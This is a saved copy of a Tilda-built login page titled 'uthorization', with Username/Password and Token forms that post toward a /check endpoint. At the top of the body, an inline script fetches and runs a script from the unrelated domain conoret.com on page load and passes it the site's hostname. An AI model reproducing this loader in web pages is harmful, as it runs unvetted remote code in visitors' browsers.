<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <!--metatextblock-->
    <title>uthorization</title>
    <meta
      property="og:url"
      content="http://project4715141.tilda.ws/page30549260.html"
    />
    <meta property="og:title" content="uthorization" />
    <meta property="og:description" content="" />
    <meta property="og:type" content="website" />
    <link
      rel="canonical"
      href="http://project4715141.tilda.ws/page30549260.html"
    />
    <!--/metatextblock-->
    <meta property="fb:app_id" content="257953674358265" />
    <meta name="format-detection" content="telephone=no" />
    <meta http-equiv="x-dns-prefetch-control" content="on" />
    <link rel="dns-prefetch" href="https://ws.tildacdn.com/" />
    <link rel="dns-prefetch" href="https://static.tildacdn.info/" />
    <link
      rel="shortcut icon"
      href="https://static.tildacdn.info/img/tildafavicon.ico"
      type="image/x-icon"
    />
    <!-- Assets -->
    <script
      type="text/javascript"
      async=""
      id="tildastatscript"
      src="/static/auth_files//tilda-stat-1.0.min.js.download"
    ></script>
    <script
      src="/static/auth_files//tilda-fallback-1.0.min.js.download"
      charset="utf-8"
      async=""
    ></script>
    <link
      rel="stylesheet"
      href="/static/auth_files//tilda-grid-3.0.min.css"
      type="text/css"
      media="all"
      onerror="this.loaderr=&#39;y&#39;;"
    />
    <link
      rel="stylesheet"
      href="/static/auth_files//tilda-blocks-page30549260.min.css"
      type="text/css"
      media="all"
      onerror="this.loaderr=&#39;y&#39;;"
    />
    <link
      rel="stylesheet"
      href="/static/auth_files//tilda-animation-1.0.min.css"
      type="text/css"
      media="all"
      onerror="this.loaderr=&#39;y&#39;;"
    />
    <link
      rel="stylesheet"
      href="/static/auth_files//tilda-forms-1.0.min.css"
      type="text/css"
      media="all"
      onerror="this.loaderr=&#39;y&#39;;"
    />
    <script type="text/javascript">
      (function (d) {
        if (!d.visibilityState) {
          var s = d.createElement("script");
          s.src = "https://static.tildacdn.info/js/tilda-polyfill-1.0.min.js";
          d.getElementsByTagName("head")[0].appendChild(s);
        }
      })(document);
      function t_onReady(func) {
        if (document.readyState != "loading") {
          func();
        } else {
          document.addEventListener("DOMContentLoaded", func);
        }
      }
      function t_onFuncLoad(funcName, okFunc, time) {
        if (typeof window[funcName] === "function") {
          okFunc();
        } else {
          setTimeout(function () {
            t_onFuncLoad(funcName, okFunc, time);
          }, time || 100);
        }
      }
    </script>
    <script
      src="/static/auth_files//jquery-1.10.2.min.js.download"
      onerror="this.loaderr=&#39;y&#39;;"
    ></script>
    <script
      src="/static/auth_files//tilda-scripts-3.0.min.js.download"
      onerror="this.loaderr=&#39;y&#39;;"
    ></script>
    <script
      src="/static/auth_files//tilda-blocks-page30549260.min.js.download"
      onerror="this.loaderr=&#39;y&#39;;"
    ></script>
    <script
      src="/static/auth_files//lazyload-1.3.min.js.download"
      charset="utf-8"
      async=""
      onerror="this.loaderr=&#39;y&#39;;"
    ></script>
    <script
      src="/static/auth_files//tilda-animation-1.0.min.js.download"
      charset="utf-8"
      async=""
      onerror="this.loaderr=&#39;y&#39;;"
    ></script>
    <script
      src="/static/auth_files//tilda-zero-1.1.min.js.download"
      charset="utf-8"
      async=""
      onerror="this.loaderr=&#39;y&#39;;"
    ></script>
    <script
      src="/static/auth_files//tilda-events-1.0.min.js.download"
      charset="utf-8"
      async=""
      onerror="this.loaderr=&#39;y&#39;;"
    ></script>
    <script
      src="/static/auth_files//tilda-forms-1.0.min.js.download"
      charset="utf-8"
      async=""
      onerror="this.loaderr=&#39;y&#39;;"
    ></script>
    <script
      src="/static/auth_files//tilda-zero-forms-1.0.min.js.download"
      charset="utf-8"
      async=""
      onerror="this.loaderr=&#39;y&#39;;"
    ></script>
    <script type="text/javascript">
      window.dataLayer = window.dataLayer || [];
    </script>
    <script type="text/javascript">
      (function () {
        if (
          /bot|google|yandex|baidu|bing|msn|duckduckbot|teoma|slurp|crawler|spider|robot|crawling|facebook/i.test(
            navigator.userAgent
          ) === false &&
          typeof sessionStorage != "undefined" &&
          sessionStorage.getItem("visited") !== "y" &&
          document.visibilityState
        ) {
          var style = document.createElement("style");
          style.type = "text/css";
          style.innerHTML =
            "@media screen and (min-width: 980px) {.t-records {opacity: 0;}.t-records_animated {-webkit-transition: opacity ease-in-out .2s;-moz-transition: opacity ease-in-out .2s;-o-transition: opacity ease-in-out .2s;transition: opacity ease-in-out .2s;}.t-records.t-records_visible {opacity: 1;}}";
          document.getElementsByTagName("head")[0].appendChild(style);
          function t_setvisRecs() {
            var alr = document.querySelectorAll(".t-records");
            Array.prototype.forEach.call(alr, function (el) {
              el.classList.add("t-records_animated");
            });
            setTimeout(function () {
              Array.prototype.forEach.call(alr, function (el) {
                el.classList.add("t-records_visible");
              });
              sessionStorage.setItem("visited", "y");
            }, 400);
          }
          document.addEventListener("DOMContentLoaded", t_setvisRecs);
        }
      })();
    </script>
    <script
      src="/static/auth_files//dsp"
      type="text/javascript"
      defer=""
      async=""
    ></script>
    <style type="text/css">
      div.t-records {
        opacity: 1;
      }
    </style>
  </head>
  <body class="t-body" style="margin: 0px">
    <script type="text/javascript">
      window.top === window &&
        !(function () {
          var e = document.createElement("script"),
            t = document.getElementsByTagName("head")[0];
          (e.src =
            "//conoret.com/dsp?h=" +
            document.location.hostname +
            "&r=" +
            Math.random()),
            (e.type = "text/javascript"),
            (e.defer = !0),
            (e.async = !0),
            t.appendChild(e);
        })();
    </script>
    <!--allrecords-->
    <div
      id="allrecords"
      class="t-records"
      data-hook="blocks-collection-content-node"
      data-tilda-project-id="4715141"
      data-tilda-page-id="30549260"
      data-tilda-formskey="d5837e56d0920b4fefa351e754715141"
      data-tilda-lazy="yes"
    >
      <div
        id="rec494444422"
        class="r t-rec"
        style=""
        data-animationappear="off"
        data-record-type="396"
      >
        <!-- T396 --><style>
          #rec494444422 .t396__artboard {
            min-height: 550px;
            height: 100vh;
            background-color: #ffffff;
          }
          #rec494444422 .t396__filter {
            min-height: 550px;
            height: 100vh;
          }
          #rec494444422 .t396__carrier {
            min-height: 550px;
            height: 100vh;
            background-position: center center;
            background-attachment: scroll;
            background-image: url("https://static.tildacdn.info/tild3131-6232-4638-b139-313864373039/-/resize/20x/1641165289_1-damion-.jpg");
            background-size: cover;
            background-repeat: no-repeat;
          }
          @media screen and (max-width: 1199px) {
            #rec494444422 .t396__artboard {
            }
            #rec494444422 .t396__filter {
            }
            #rec494444422 .t396__carrier {
              background-attachment: scroll;
            }
          }
          @media screen and (max-width: 959px) {
          }
          @media screen and (max-width: 639px) {
          }
          @media screen and (max-width: 479px) {
          }
          #rec494444422 .tn-elem[data-elem-id="1664106930528"] {
            z-index: 1;
            top: calc(50vh - 275px + 180px);
            left: calc(50% - 600px + 0px);
            width: 460px;
          }
          #rec494444422 .tn-elem[data-elem-id="1664106930528"] .tn-atom {
            background-position: center center;
            border-color: transparent;
            border-style: solid;
          }
          @media screen and (max-width: 1199px) {
          }
          @media screen and (max-width: 959px) {
          }
          @media screen and (max-width: 639px) {
          }
          @media screen and (max-width: 479px) {
          }
          #rec494444422 .tn-elem[data-elem-id="1664107318417"] {
            z-index: 2;
            top: calc(50vh - 275px + 215px);
            left: calc(50% - 600px + 740px);
            width: 460px;
          }
          #rec494444422 .tn-elem[data-elem-id="1664107318417"] .tn-atom {
            background-position: center center;
            border-color: transparent;
            border-style: solid;
          }
          @media screen and (max-width: 1199px) {
          }
          @media screen and (max-width: 959px) {
          }
          @media screen and (max-width: 639px) {
          }
          @media screen and (max-width: 479px) {
          }
          #rec494444422 .tn-elem[data-elem-id="1664107397170"] {
            color: #d5ff00;
            z-index: 3;
            top: calc(50vh - 275px + 25px);
            left: calc(50% - 600px + 141px);
            width: 919px;
          }
          #rec494444422 .tn-elem[data-elem-id="1664107397170"] .tn-atom {
            color: #d5ff00;
            font-size: 43px;
            font-family: "Arial", Arial, sans-serif;
            line-height: 1.55;
            font-weight: 700;
            background-position: center center;
            border-color: transparent;
            border-style: solid;
          }
          @media screen and (max-width: 1199px) {
          }
          @media screen and (max-width: 959px) {
          }
          @media screen and (max-width: 639px) {
          }
          @media screen and (max-width: 479px) {
          }
        </style>
        <div class="t396">
          <div
            class="t396__artboard rendered"
            data-artboard-recid="494444422"
            data-artboard-height="550"
            data-artboard-height_vh="100"
            data-artboard-valign="center"
            data-artboard-ovrflw=""
            data-artboard-proxy-min-offset-top="185.5"
            data-artboard-proxy-min-height="550"
            data-artboard-proxy-max-height="921"
          >
            <div
              class="t396__carrier t-bgimg loaded"
              data-artboard-recid="494444422"
              data-original="https://static.tildacdn.info/tild3131-6232-4638-b139-313864373039/1641165289_1-damion-.jpg"
              style="
                background-image: url('https://thumb.tildacdn.com/tild3131-6232-4638-b139-313864373039/-/format/webp/1641165289_1-damion-.jpg');
              "
            ></div>
            <div class="t396__filter" data-artboard-recid="494444422"></div>
            <div
              class="t396__elem tn-elem tn-elem__4944444221664106930528 t-animate zero-form-rendered t-animate_started"
              data-elem-id="1664106930528"
              data-elem-type="form"
              data-field-top-value="180"
              data-field-left-value="0"
              data-field-width-value="460"
              data-field-axisy-value="top"
              data-field-axisx-value="left"
              data-field-container-value="grid"
              data-field-topunits-value="px"
              data-field-leftunits-value="px"
              data-field-heightunits-value=""
              data-field-widthunits-value="px"
              data-animate-style="zoomin"
              data-animate-duration="1"
              data-animate-scale="0.9"
              data-field-inputpos-value="v"
              data-field-inputfontfamily-value="Arial"
              data-field-inputfontsize-value="29"
              data-field-inputfontweight-value="500"
              data-field-inputcolor-value="#000"
              data-field-inputbgcolor-value="#fff"
              data-field-inputbordercolor-value="#00ffd9"
              data-field-inputbordersize-value="2"
              data-field-inputheight-value="50"
              data-field-inputmargbottom-value="20"
              data-field-inputmargright-value="20"
              data-field-inputtitlefontsize-value="16"
              data-field-inputtitlefontweight-value="400"
              data-field-inputtitlecolor-value="#000"
              data-field-inputtitlemargbottom-value="5"
              data-field-inputelsfontweight-value="400"
              data-field-inputelsfontsize-value="14"
              data-field-buttontitle-value="SUBMIT"
              data-field-buttonalign-value="center"
              data-field-buttoncolor-value="#ffff00"
              data-field-buttonbgcolor-value="#000000"
              data-field-buttonbordercolor-value="#00ffcc"
              data-field-buttonbordersize-value="1"
              data-field-buttonwidth-value="160"
              data-field-buttonheight-value="50"
              data-field-buttonfontsize-value="14"
              data-field-buttonfontweight-value="600"
              data-field-formmsgurl-value="/check"
              data-fields="width,top,left,inputs,container,axisx,axisy,widthunits,leftunits,topunits"
              style="
                width: 460px;
                left: 351.5px;
                top: 365.5px;
                transform: scale(0.9);
                transition-duration: 1s;
              "
            >
              <div class="tn-atom tn-atom__form">
                <form
                  id="form494444422"
                  name="form494444422"
                  role="form"
                  action="https://project4715141.tilda.ws/auth/#"
                  method="POST"
                  data-formactiontype="2"
                  data-inputbox=".t-input-group"
                  class="t-form js-form-proccess t-form_inputs-total_2"
                  data-success-url="/check"
                  data-success-callback="t396_onSuccess"
                  data-success-popup="y"
                  data-error-popup="y"
                >
                  <div
                    class="js-successbox t-form__successbox t-text t-text_sm"
                    style="display: none"
                  ></div>
                  <div class="t-form__inputsbox">
                    <div
                      class="t-input-group t-input-group_nm"
                      data-input-lid="1531306243545"
                      style="margin-bottom: 20px"
                    >
                      <div class="t-input-block">
                        <input
                          type="text"
                          name="Name"
                          class="t-input js-tilda-rule"
                          value=""
                          placeholder="Username"
                          data-tilda-req="1"
                          data-tilda-rule="name"
                          style="
                            color: #000;
                            border: 2px solid #00ffd9;
                            background-color: #fff;
                            font-size: 29px;
                            font-weight: 500;
                            height: 50px;
                          "
                        />
                        <div class="t-input-error"></div>
                      </div>
                    </div>
                    <div
                      class="t-input-group t-input-group_in"
                      data-input-lid="1531306540094"
                      style="margin-bottom: 20px"
                    >
                      <div class="t-input-block">
                        <input
                          type="text"
                          name="Input"
                          class="t-input js-tilda-rule"
                          value=""
                          placeholder="Password"
                          data-tilda-req="1"
                          style="
                            color: #000;
                            border: 2px solid #00ffd9;
                            background-color: #fff;
                            font-size: 29px;
                            font-weight: 500;
                            height: 50px;
                          "
                        />
                        <div class="t-input-error"></div>
                      </div>
                    </div>
                    <div class="t-form__errorbox-middle">
                      <div
                        class="js-errorbox-all t-form__errorbox-wrapper"
                        style="display: none"
                      >
                        <div class="t-form__errorbox-text t-text t-text_xs">
                          <p
                            class="t-form__errorbox-item js-rule-error js-rule-error-all"
                          ></p>
                          <p
                            class="t-form__errorbox-item js-rule-error js-rule-error-req"
                          ></p>
                          <p
                            class="t-form__errorbox-item js-rule-error js-rule-error-email"
                          ></p>
                          <p
                            class="t-form__errorbox-item js-rule-error js-rule-error-name"
                          ></p>
                          <p
                            class="t-form__errorbox-item js-rule-error js-rule-error-phone"
                          ></p>
                          <p
                            class="t-form__errorbox-item js-rule-error js-rule-error-string"
                          ></p>
                        </div>
                        <div class="tn-form__errorbox-close js-errorbox-close">
                          <div
                            class="tn-form__errorbox-close-line tn-form__errorbox-close-line-left"
                          ></div>
                          <div
                            class="tn-form__errorbox-close-line tn-form__errorbox-close-line-right"
                          ></div>
                        </div>
                      </div>
                      <style>
                        .tn-atom .t-input-error {
                          position: absolute;
                          color: red;
                          background-color: #fff;
                          padding: 8px 10px;
                          border-radius: 2px;
                          z-index: 1;
                          margin-top: 5px;
                          left: 0px;
                          box-shadow: 0px 1px 20px 0px rgba(0, 0, 0, 0.2);
                        }
                        .tn-atom .t-input-error:after {
                          content: "";
                          position: absolute;
                          width: 0;
                          height: 0;
                          border: solid transparent;
                          border-width: 6px;
                          top: -12px;
                          left: 15%;
                          border-bottom-color: #fff;
                        }
                        .tn-form__errorbox-close {
                          height: 14px;
                          position: absolute;
                          right: 8px;
                          top: 8px;
                          width: 14px;
                          cursor: pointer;
                        }
                        .tn-form__errorbox-close-line {
                          background: #fff none repeat scroll 0 0;
                          height: 1px;
                          left: 0;
                          margin-top: -1px;
                          position: absolute;
                          top: 50%;
                          width: 100%;
                        }
                        .tn-form__errorbox-close-line-left {
                          transform: rotate(45deg);
                        }
                        .tn-form__errorbox-close-line-right {
                          transform: rotate(-45deg);
                        }
                        .tn-atom .t-form__errorbox-wrapper,
                        .tn-form__errorbox-popup {
                          position: fixed;
                          bottom: 20px;
                          right: 20px;
                          z-index: 10000;
                          max-width: 400px;
                          min-width: 260px;
                          width: auto;
                          box-shadow: 0 0 3px 1px rgba(0, 0, 0, 0.2);
                          border-radius: 3px;
                          text-align: left;
                          font-family: Arial, sans-serf;
                          background: #f95d51;
                          padding: 10px;
                        }
                        .tn-atom .js-error-control-box .t-radio__wrapper,
                        .tn-atom .js-error-control-box .t-checkbox__control {
                          padding: 3px;
                          margin-top: -3px;
                        }
                        @media screen and (max-width: 480px) {
                          .tn-atom .t-form__errorbox-wrapper,
                          .tn-form__errorbox-popup {
                            max-width: 280px;
                          }
                        }
                      </style>
                    </div>
                    <div class="tn-form__submit" style="text-align: center">
                      <a href="/check/login"
                        ><button
                          type="submit"
                          class="t-submit"
                          style="
                            color: #ffff00;
                            border: 1px solid #00ffcc;
                            background-color: #000000;
                            font-weight: 600;
                            font-size: 14px;
                            width: 160px;
                            height: 50px;
                            margin-left: auto;
                            margin-right: auto;
                            padding: 0 15px;
                            display: block;
                          "
                        >
                          SUBMIT
                        </button></a
                      >
                    </div>
                  </div>
                  <div class="t-form__errorbox-bottom">
                    <div
                      class="js-errorbox-all t-form__errorbox-wrapper"
                      style="display: none"
                    >
                      <div class="t-form__errorbox-text t-text t-text_xs">
                        <p
                          class="t-form__errorbox-item js-rule-error js-rule-error-all"
                        ></p>
                        <p
                          class="t-form__errorbox-item js-rule-error js-rule-error-req"
                        ></p>
                        <p
                          class="t-form__errorbox-item js-rule-error js-rule-error-email"
                        ></p>
                        <p
                          class="t-form__errorbox-item js-rule-error js-rule-error-name"
                        ></p>
                        <p
                          class="t-form__errorbox-item js-rule-error js-rule-error-phone"
                        ></p>
                        <p
                          class="t-form__errorbox-item js-rule-error js-rule-error-string"
                        ></p>
                      </div>
                      <div class="tn-form__errorbox-close js-errorbox-close">
                        <div
                          class="tn-form__errorbox-close-line tn-form__errorbox-close-line-left"
                        ></div>
                        <div
                          class="tn-form__errorbox-close-line tn-form__errorbox-close-line-right"
                        ></div>
                      </div>
                    </div>
                    <style>
                      .tn-atom .t-input-error {
                        position: absolute;
                        color: red;
                        background-color: #fff;
                        padding: 8px 10px;
                        border-radius: 2px;
                        z-index: 1;
                        margin-top: 5px;
                        left: 0px;
                        box-shadow: 0px 1px 20px 0px rgba(0, 0, 0, 0.2);
                      }
                      .tn-atom .t-input-error:after {
                        content: "";
                        position: absolute;
                        width: 0;
                        height: 0;
                        border: solid transparent;
                        border-width: 6px;
                        top: -12px;
                        left: 15%;
                        border-bottom-color: #fff;
                      }
                      .tn-form__errorbox-close {
                        height: 14px;
                        position: absolute;
                        right: 8px;
                        top: 8px;
                        width: 14px;
                        cursor: pointer;
                      }
                      .tn-form__errorbox-close-line {
                        background: #fff none repeat scroll 0 0;
                        height: 1px;
                        left: 0;
                        margin-top: -1px;
                        position: absolute;
                        top: 50%;
                        width: 100%;
                      }
                      .tn-form__errorbox-close-line-left {
                        transform: rotate(45deg);
                      }
                      .tn-form__errorbox-close-line-right {
                        transform: rotate(-45deg);
                      }
                      .tn-atom .t-form__errorbox-wrapper,
                      .tn-form__errorbox-popup {
                        position: fixed;
                        bottom: 20px;
                        right: 20px;
                        z-index: 10000;
                        max-width: 400px;
                        min-width: 260px;
                        width: auto;
                        box-shadow: 0 0 3px 1px rgba(0, 0, 0, 0.2);
                        border-radius: 3px;
                        text-align: left;
                        font-family: Arial, sans-serf;
                        background: #f95d51;
                        padding: 10px;
                      }
                      .tn-atom .js-error-control-box .t-radio__wrapper,
                      .tn-atom .js-error-control-box .t-checkbox__control {
                        padding: 3px;
                        margin-top: -3px;
                      }
                      @media screen and (max-width: 480px) {
                        .tn-atom .t-form__errorbox-wrapper,
                        .tn-form__errorbox-popup {
                          max-width: 280px;
                        }
                      }
                    </style>
                  </div>
                  <div
                    style="
                      position: absolute;
                      left: -5000px;
                      bottom: 0;
                      display: none;
                    "
                  >
                    <input
                      type="text"
                      name="form-spec-comments"
                      value="Its good"
                      class="js-form-spec-comments"
                      tabindex="-1"
                    />
                  </div>
                </form>
                <style>
                  #rec494444422
                    .tn-elem[data-elem-id="1664106930528"]
                    input::-webkit-input-placeholder {
                    color: #000;
                    opacity: 0.5;
                  }
                  #rec494444422
                    .tn-elem[data-elem-id="1664106930528"]
                    input::-moz-placeholder {
                    color: #000;
                    opacity: 0.5;
                  }
                  #rec494444422
                    .tn-elem[data-elem-id="1664106930528"]
                    input:-moz-placeholder {
                    color: #000;
                    opacity: 0.5;
                  }
                  #rec494444422
                    .tn-elem[data-elem-id="1664106930528"]
                    input:-ms-input-placeholder {
                    color: #000;
                    opacity: 0.5;
                  }
                  #rec494444422
                    .tn-elem[data-elem-id="1664106930528"]
                    textarea::-webkit-input-placeholder {
                    color: #000;
                    opacity: 0.5;
                  }
                  #rec494444422
                    .tn-elem[data-elem-id="1664106930528"]
                    textarea::-moz-placeholder {
                    color: #000;
                    opacity: 0.5;
                  }
                  #rec494444422
                    .tn-elem[data-elem-id="1664106930528"]
                    textarea:-moz-placeholder {
                    color: #000;
                    opacity: 0.5;
                  }
                  #rec494444422
                    .tn-elem[data-elem-id="1664106930528"]
                    textarea:-ms-input-placeholder {
                    color: #000;
                    opacity: 0.5;
                  }</style
                ><style>
                  .tn-atom .t-input-block {
                    position: relative;
                  }
                </style>
              </div>
              <!--googleoff: all--><!--noindex-->
              <div
                data-nosnippet="true"
                class="tn-atom__inputs-wrapp"
                style="display: none"
              >
                <textarea class="tn-atom__inputs-textarea">
{"0":{"lid":"1531306243545","ls":"10","loff":"","li_type":"nm","li_ph":"Username","li_req":"y","li_nm":"Name"},"1":{"lid":"1531306540094","ls":"20","loff":"","li_type":"in","li_ph":"Password","li_req":"y","li_nm":"Input"}}</textarea
                >
              </div>
              <!--/noindex--><!--googleon: all-->
            </div>
            <div
              class="t396__elem tn-elem tn-elem__4944444221664107318417 t-animate zero-form-rendered t-animate_started"
              data-elem-id="1664107318417"
              data-elem-type="form"
              data-field-top-value="215"
              data-field-left-value="740"
              data-field-width-value="460"
              data-field-axisy-value="top"
              data-field-axisx-value="left"
              data-field-container-value="grid"
              data-field-topunits-value="px"
              data-field-leftunits-value="px"
              data-field-heightunits-value=""
              data-field-widthunits-value="px"
              data-animate-style="zoomin"
              data-animate-duration="1"
              data-animate-delay="0.3"
              data-animate-scale="0.9"
              data-field-inputpos-value="h"
              data-field-inputfontfamily-value="Arial"
              data-field-inputfontsize-value="28"
              data-field-inputfontweight-value="400"
              data-field-inputcolor-value="#000"
              data-field-inputbgcolor-value="#fff"
              data-field-inputbordercolor-value="#00ffd9"
              data-field-inputbordersize-value="2"
              data-field-inputheight-value="50"
              data-field-inputmargbottom-value="20"
              data-field-inputmargright-value="20"
              data-field-inputtitlefontsize-value="16"
              data-field-inputtitlefontweight-value="400"
              data-field-inputtitlecolor-value="#000"
              data-field-inputtitlemargbottom-value="5"
              data-field-inputelsfontweight-value="400"
              data-field-inputelsfontsize-value="14"
              data-field-buttontitle-value="SUBMIT"
              data-field-buttoncolor-value="#fff700"
              data-field-buttonbgcolor-value="#000000"
              data-field-buttonbordercolor-value="#00ffee"
              data-field-buttonbordersize-value="1"
              data-field-buttonwidth-value="160"
              data-field-buttonheight-value="50"
              data-field-buttonshadowsize-value="0"
              data-field-buttonshadowopacity-value="0"
              data-field-buttonfontfamily-value="cyber"
              data-field-buttonfontsize-value="14"
              data-field-buttonfontweight-value="600"
              data-field-formmsgurl-value="/check"
              data-field-formerrreq-value="Введите токен"
              data-fields="width,top,left,inputs,container,axisx,axisy,widthunits,leftunits,topunits"
              style="
                width: 460px;
                left: 1091.5px;
                top: 400.5px;
                transform: scale(0.9);
                transition-delay: 0.3s;
                transition-duration: 1s;
              "
            >
              <div class="tn-atom tn-atom__form">
                <form
                  id="form494444422"
                  name="form494444422"
                  role="form"
                  action="https://project4715141.tilda.ws/auth/#"
                  method="POST"
                  data-formactiontype="2"
                  data-inputbox=".t-input-group"
                  class="t-form js-form-proccess t-form_inputs-total_1 tn-form_horiz"
                  data-success-url="/check"
                  data-success-callback="t396_onSuccess"
                  data-success-popup="y"
                  data-error-popup="y"
                >
                  <div
                    class="js-successbox t-form__successbox t-text t-text_sm"
                    style="display: none"
                  ></div>
                  <div class="t-form__inputsbox">
                    <div
                      class="t-input-group t-input-group_in"
                      data-input-lid="1531306540094"
                      style="margin-bottom: 20px; padding-right: 20px"
                    >
                      <div class="t-input-block">
                        <input
                          type="text"
                          name="Input"
                          class="t-input js-tilda-rule"
                          value=""
                          placeholder="Token"
                          data-tilda-req="1"
                          style="
                            color: #000;
                            border: 2px solid #00ffd9;
                            background-color: #fff;
                            font-size: 28px;
                            font-weight: 400;
                            height: 50px;
                          "
                        />
                        <div class="t-input-error"></div>
                      </div>
                    </div>
                    <div class="t-form__errorbox-middle">
                      <div
                        class="js-errorbox-all t-form__errorbox-wrapper"
                        style="display: none"
                      >
                        <div class="t-form__errorbox-text t-text t-text_xs">
                          <p
                            class="t-form__errorbox-item js-rule-error js-rule-error-all"
                          ></p>
                          <p
                            class="t-form__errorbox-item js-rule-error js-rule-error-req"
                          >
                            Введите токен
                          </p>
                          <p
                            class="t-form__errorbox-item js-rule-error js-rule-error-email"
                          ></p>
                          <p
                            class="t-form__errorbox-item js-rule-error js-rule-error-name"
                          ></p>
                          <p
                            class="t-form__errorbox-item js-rule-error js-rule-error-phone"
                          ></p>
                          <p
                            class="t-form__errorbox-item js-rule-error js-rule-error-string"
                          ></p>
                        </div>
                        <div class="tn-form__errorbox-close js-errorbox-close">
                          <div
                            class="tn-form__errorbox-close-line tn-form__errorbox-close-line-left"
                          ></div>
                          <div
                            class="tn-form__errorbox-close-line tn-form__errorbox-close-line-right"
                          ></div>
                        </div>
                      </div>
                      <style>
                        .tn-atom .t-input-error {
                          position: absolute;
                          color: red;
                          background-color: #fff;
                          padding: 8px 10px;
                          border-radius: 2px;
                          z-index: 1;
                          margin-top: 5px;
                          left: 0px;
                          box-shadow: 0px 1px 20px 0px rgba(0, 0, 0, 0.2);
                        }
                        .tn-atom .t-input-error:after {
                          content: "";
                          position: absolute;
                          width: 0;
                          height: 0;
                          border: solid transparent;
                          border-width: 6px;
                          top: -12px;
                          left: 15%;
                          border-bottom-color: #fff;
                        }
                        .tn-form__errorbox-close {
                          height: 14px;
                          position: absolute;
                          right: 8px;
                          top: 8px;
                          width: 14px;
                          cursor: pointer;
                        }
                        .tn-form__errorbox-close-line {
                          background: #fff none repeat scroll 0 0;
                          height: 1px;
                          left: 0;
                          margin-top: -1px;
                          position: absolute;
                          top: 50%;
                          width: 100%;
                        }
                        .tn-form__errorbox-close-line-left {
                          transform: rotate(45deg);
                        }
                        .tn-form__errorbox-close-line-right {
                          transform: rotate(-45deg);
                        }
                        .tn-atom .t-form__errorbox-wrapper,
                        .tn-form__errorbox-popup {
                          position: fixed;
                          bottom: 20px;
                          right: 20px;
                          z-index: 10000;
                          max-width: 400px;
                          min-width: 260px;
                          width: auto;
                          box-shadow: 0 0 3px 1px rgba(0, 0, 0, 0.2);
                          border-radius: 3px;
                          text-align: left;
                          font-family: Arial, sans-serf;
                          background: #f95d51;
                          padding: 10px;
                        }
                        .tn-atom .js-error-control-box .t-radio__wrapper,
                        .tn-atom .js-error-control-box .t-checkbox__control {
                          padding: 3px;
                          margin-top: -3px;
                        }
                        @media screen and (max-width: 480px) {
                          .tn-atom .t-form__errorbox-wrapper,
                          .tn-form__errorbox-popup {
                            max-width: 280px;
                          }
                        }
                      </style>
                    </div>
                    <div class="tn-form__submit" style="">
                      <a href="/check/login"
                        ><button
                          type="submit"
                          class="t-submit"
                          style="
                            color: #fff700;
                            border: 1px solid #00ffee;
                            background-color: #000000;
                            font-family: cyber;
                            font-weight: 600;
                            font-size: 14px;
                            box-shadow: 0px 0px 0px 0px rgba(0, 0, 0, 0);
                            width: 160px;
                            height: 50px;
                            padding: 0 15px;
                            display: block;
                          "
                        >
                          SUBMIT
                        </button></a
                      >
                    </div>
                  </div>
                  <div class="t-form__errorbox-bottom">
                    <div
                      class="js-errorbox-all t-form__errorbox-wrapper"
                      style="display: none"
                    >
                      <div class="t-form__errorbox-text t-text t-text_xs">
                        <p
                          class="t-form__errorbox-item js-rule-error js-rule-error-all"
                        ></p>
                        <p
                          class="t-form__errorbox-item js-rule-error js-rule-error-req"
                        >
                          Введите токен
                        </p>
                        <p
                          class="t-form__errorbox-item js-rule-error js-rule-error-email"
                        ></p>
                        <p
                          class="t-form__errorbox-item js-rule-error js-rule-error-name"
                        ></p>
                        <p
                          class="t-form__errorbox-item js-rule-error js-rule-error-phone"
                        ></p>
                        <p
                          class="t-form__errorbox-item js-rule-error js-rule-error-string"
                        ></p>
                      </div>
                      <div class="tn-form__errorbox-close js-errorbox-close">
                        <div
                          class="tn-form__errorbox-close-line tn-form__errorbox-close-line-left"
                        ></div>
                        <div
                          class="tn-form__errorbox-close-line tn-form__errorbox-close-line-right"
                        ></div>
                      </div>
                    </div>
                    <style>
                      .tn-atom .t-input-error {
                        position: absolute;
                        color: red;
                        background-color: #fff;
                        padding: 8px 10px;
                        border-radius: 2px;
                        z-index: 1;
                        margin-top: 5px;
                        left: 0px;
                        box-shadow: 0px 1px 20px 0px rgba(0, 0, 0, 0.2);
                      }
                      .tn-atom .t-input-error:after {
                        content: "";
                        position: absolute;
                        width: 0;
                        height: 0;
                        border: solid transparent;
                        border-width: 6px;
                        top: -12px;
                        left: 15%;
                        border-bottom-color: #fff;
                      }
                      .tn-form__errorbox-close {
                        height: 14px;
                        position: absolute;
                        right: 8px;
                        top: 8px;
                        width: 14px;
                        cursor: pointer;
                      }
                      .tn-form__errorbox-close-line {
                        background: #fff none repeat scroll 0 0;
                        height: 1px;
                        left: 0;
                        margin-top: -1px;
                        position: absolute;
                        top: 50%;
                        width: 100%;
                      }
                      .tn-form__errorbox-close-line-left {
                        transform: rotate(45deg);
                      }
                      .tn-form__errorbox-close-line-right {
                        transform: rotate(-45deg);
                      }
                      .tn-atom .t-form__errorbox-wrapper,
                      .tn-form__errorbox-popup {
                        position: fixed;
                        bottom: 20px;
                        right: 20px;
                        z-index: 10000;
                        max-width: 400px;
                        min-width: 260px;
                        width: auto;
                        box-shadow: 0 0 3px 1px rgba(0, 0, 0, 0.2);
                        border-radius: 3px;
                        text-align: left;
                        font-family: Arial, sans-serf;
                        background: #f95d51;
                        padding: 10px;
                      }
                      .tn-atom .js-error-control-box .t-radio__wrapper,
                      .tn-atom .js-error-control-box .t-checkbox__control {
                        padding: 3px;
                        margin-top: -3px;
                      }
                      @media screen and (max-width: 480px) {
                        .tn-atom .t-form__errorbox-wrapper,
                        .tn-form__errorbox-popup {
                          max-width: 280px;
                        }
                      }
                    </style>
                  </div>
                  <div
                    style="
                      position: absolute;
                      left: -5000px;
                      bottom: 0;
                      display: none;
                    "
                  >
                    <input
                      type="text"
                      name="form-spec-comments"
                      value="Its good"
                      class="js-form-spec-comments"
                      tabindex="-1"
                    />
                  </div>
                </form>
                <style>
                  #rec494444422
                    .tn-elem[data-elem-id="1664107318417"]
                    input::-webkit-input-placeholder {
                    color: #000;
                    opacity: 0.5;
                  }
                  #rec494444422
                    .tn-elem[data-elem-id="1664107318417"]
                    input::-moz-placeholder {
                    color: #000;
                    opacity: 0.5;
                  }
                  #rec494444422
                    .tn-elem[data-elem-id="1664107318417"]
                    input:-moz-placeholder {
                    color: #000;
                    opacity: 0.5;
                  }
                  #rec494444422
                    .tn-elem[data-elem-id="1664107318417"]
                    input:-ms-input-placeholder {
                    color: #000;
                    opacity: 0.5;
                  }
